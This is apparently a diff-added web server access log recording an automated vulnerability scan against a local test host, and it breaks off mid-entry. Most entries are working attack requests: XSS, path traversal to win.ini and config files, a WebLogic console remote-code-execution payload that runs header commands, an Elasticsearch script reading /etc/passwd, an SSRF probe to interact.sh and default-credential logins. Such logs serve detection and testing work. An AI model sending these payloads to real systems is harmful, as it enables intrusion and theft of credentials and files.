+{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/thumb.php?dir=.....///http/.....///config/config_db.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"type=login&loginCode=YWRtaW4=&pwd=MDAwMDAw&","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /c6/Jhsoft.Web.login/AjaxForLogin.aspx HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"btnPost=Log+In&username={{username}}&password=0a7ef986b3b5ab8a809774cf3d09ec16&savedate=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /zb_system/cmd.php?act=verify HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /ui_base/js/..%2f..%2f..%2f..%2fsettings.js HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /documentation HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /stats/summary HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"{\x0D\x0A \x22token\x22: {\x0D\x0A \x22$func\x22: \x22var_dump\x22\x0D\x0A }\x0D\x0A}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth/newpassword HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\x22connectionHandler\x22);field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod(\x22getServletRequest\x22).invoke(obj); String cmd = req.getHeader(\x22CMD\x22);String[] cmds = System.getProperty(\x22os.name\x22).toLowerCase().contains(\x22window\x22) ? new String[]{\x22cmd.exe\x22, \x22/c\x22, cmd} : new String[]{\x22/bin/sh\x22, \x22-c\x22, cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter(\x22\x5C\x5CA\x22).next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod(\x22getResponse\x22).invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/graphql/v1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/20 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /var/resource_config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.idea/workspace.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"requester=login&request=login¶ms=%5B%7B%22name%22%3A%22input_id%22%2C%22value%22%3A%22kevinlab%22%7D%2C%7B%22name%22%3A%22input_passwd%22%2C%22value%22%3A%22kevin003%22%7D%2C%7B%22name%22%3A%22device_key%22%2C%22value%22%3A%22a2fe6b53-e09d-46df-8c9a-e666430e163e%22%7D%2C%7B%22name%22%3A%22auto_login%22%2C%22value%22%3Afalse%7D%2C%7B%22name%22%3A%22login_key%22%2C%22value%22%3A%22%22%7D%5D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /http/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /./../../../../../../../../../../windows/win.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://interact.sh/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/etc/local.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /assets/_core/php/profile.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/thumb.php?dir=http\x5C\x5C..\x5C\x5C..\x5C\x5Cconfig\x5C\x5Cconfig_db.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"{\x0D\x0A \x22size\x22: 1,\x0D\x0A \x22query\x22: {\x0D\x0A \x22filtered\x22: {\x0D\x0A \x22query\x22: {\x0D\x0A \x22match_all\x22: {\x0D\x0A }\x0D\x0A }\x0D\x0A }\x0D\x0A },\x0D\x0A \x22script_fields\x22: {\x0D\x0A \x22command\x22: {\x0D\x0A \x22script\x22: \x22import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\x5C\x22cat /etc/passwd\x5C\x22).getInputStream()).useDelimiter(\x5C\x22\x5C\x5C\x5C\x5CA\x5C\x22).next();\x22\x0D\x0A }\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_search?pretty HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zb_system/cmd.php?atc=login&redirect=http://www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php 